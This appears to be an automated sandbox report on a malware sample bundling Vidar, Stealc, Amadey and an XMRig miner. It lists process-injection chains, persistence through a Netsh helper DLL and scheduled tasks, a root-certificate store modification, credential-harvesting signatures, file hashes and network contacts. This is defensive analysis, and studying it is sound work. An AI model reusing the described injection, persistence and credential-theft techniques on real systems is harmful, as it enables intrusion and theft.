Malware Analysis Report

2024-09-11 16:13

Sample ID 240618-vxq7jasfpg
Target 6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c.zip
SHA256 6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c
Tags
stealc vidar persistence privilege_escalation stealer amadey xmrig ffb1b9 discovery miner spyware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c

Threat Level: Known bad

The file 6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c.zip was found to be: Known bad.

Malicious Activity Summary

stealc vidar persistence privilege_escalation stealer amadey xmrig ffb1b9 discovery miner spyware trojan upx

xmrig

Vidar

Detect Vidar Stealer

Stealc

Amadey

XMRig Miner payload

UPX packed file

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Reads user/profile data of local email clients

Downloads MZ/PE file

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Checks computer location settings

Drops file in Windows directory

Checks installed software on the system

Executes dropped EXE

Loads dropped DLL

Enumerates physical storage devices

Program crash

Event Triggered Execution: Netsh Helper DLL

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: LoadsDriver

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Event Triggered Execution
T1546
Netsh Helper DLL
T1546.007
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Netsh Helper DLL
T1546.007
Defense Evasion
TA0005
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-18 17:22

Signatures

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240611-en

Max time kernel

122s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2192 wrote to memory of 2340 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2340 wrote to memory of 1744 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 1744 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 1744 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 1744 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 220

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\x86\HDHelper_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\files\x86\HDHelper_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\files\x86\HDHelper_[0MB]_[1].exe"

Network

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20231129-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ASUS_WMI.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 1580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1580 wrote to memory of 2544 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1580 wrote to memory of 2544 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1580 wrote to memory of 2544 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1580 wrote to memory of 2544 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ASUS_WMI.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ASUS_WMI.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 316

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240508-en

Max time kernel

120s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ATKEX.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ATKEX.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ATKEX.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

83s

Max time network

132s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\AsIO.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1700 wrote to memory of 2128 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1700 wrote to memory of 2128 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1700 wrote to memory of 2128 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\AsIO.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\AsIO.dll,#1

Network

Country Destination Domain Proto
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 52.182.143.211:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
PL 93.184.221.240:80 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240611-en

Max time kernel

148s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2116 set thread context of 2960 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2116 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2116 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2116 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2116 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2116 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2960 wrote to memory of 2664 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2960 wrote to memory of 2664 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2960 wrote to memory of 2664 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2960 wrote to memory of 2664 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2960 wrote to memory of 2664 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2960 wrote to memory of 2664 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2664 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2664 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2664 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2664 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 148

Network

N/A

Files

memory/2116-0-0x00000000740A0000-0x0000000074214000-memory.dmp

memory/2116-1-0x0000000076D40000-0x0000000076EE9000-memory.dmp

memory/2116-8-0x00000000740A0000-0x0000000074214000-memory.dmp

memory/2116-7-0x00000000740B2000-0x00000000740B4000-memory.dmp

memory/2116-9-0x00000000740A0000-0x0000000074214000-memory.dmp

memory/2960-11-0x00000000740A0000-0x0000000074214000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9e1b9f48

MD5 e710a315ba6b618689d2ae7f300cb892
SHA1 41e7a9a71e2670a3dc4f5b68f616e69402c89a74
SHA256 7501dc3cea0131592ce66aaad7b08982fb97eb4a76adea43d3f559c3bf3dbd75
SHA512 2409683a81dfbd4d068e6343ccab24279413445594c89e32bbc99ab5b465df5d71d419f47c7eb7da3bc4121afcdab12a20b6c3d69902fdcfb1df6133aca491be

memory/2960-13-0x0000000076D40000-0x0000000076EE9000-memory.dmp

memory/2960-15-0x00000000740A0000-0x0000000074214000-memory.dmp

\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2960-19-0x00000000740A0000-0x0000000074214000-memory.dmp

memory/2664-22-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2664-21-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2960-23-0x00000000740A0000-0x0000000074214000-memory.dmp

memory/2664-25-0x0000000000AE0000-0x000000000122C000-memory.dmp

memory/2664-34-0x0000000000AE0000-0x000000000122C000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4468 set thread context of 1984 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 556 set thread context of 2892 N/A C:\ProgramData\FHDHCAAKEC.exe C:\Windows\SysWOW64\ftp.exe
PID 4212 set thread context of 516 N/A C:\ProgramData\DAKEHIJJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 2892 set thread context of 2976 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2976 set thread context of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\DAKEHIJJKE.exe N/A
N/A N/A C:\ProgramData\FHDHCAAKEC.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\ProgramData\DAKEHIJJKE.exe N/A
N/A N/A C:\ProgramData\FHDHCAAKEC.exe N/A
N/A N/A C:\ProgramData\FHDHCAAKEC.exe N/A
N/A N/A C:\ProgramData\DAKEHIJJKE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\ProgramData\FHDHCAAKEC.exe N/A
N/A N/A C:\ProgramData\DAKEHIJJKE.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
